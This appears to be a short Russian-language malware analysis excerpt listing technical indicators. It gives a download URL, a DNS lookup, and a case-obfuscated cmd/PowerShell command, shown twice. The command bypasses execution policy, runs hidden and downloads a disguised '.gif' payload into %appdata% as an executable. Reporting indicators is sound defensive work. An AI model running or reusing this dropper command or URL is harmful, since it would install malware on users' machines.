Техническая информация
- http://www.basopoew.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PowErShELL.Exe -exECutiONPolicy ByPass -nOproFIle -wInDOwstYLE HIDDEn (NEW-Object SYstEm.nEt.WebcLIENT).dOwnLoadFilE('http://www.basopoew.top/read.php?f=1.gif','%Appdata%.EXE'...
- DNS ASK ba###oew.top
- '<SYSTEM32>\cmd.exe' /C "PowErShELL.Exe -exECutiONPolicy ByPass -nOproFIle -wInDOwstYLE HIDDEn (NEW-Object SYstEm.nEt.WebcLIENT).dOwnLoadFilE('http://www.basopoew.top/read.php?f=1.gif','%Appdata%.EXE'...' (со скрытым окном)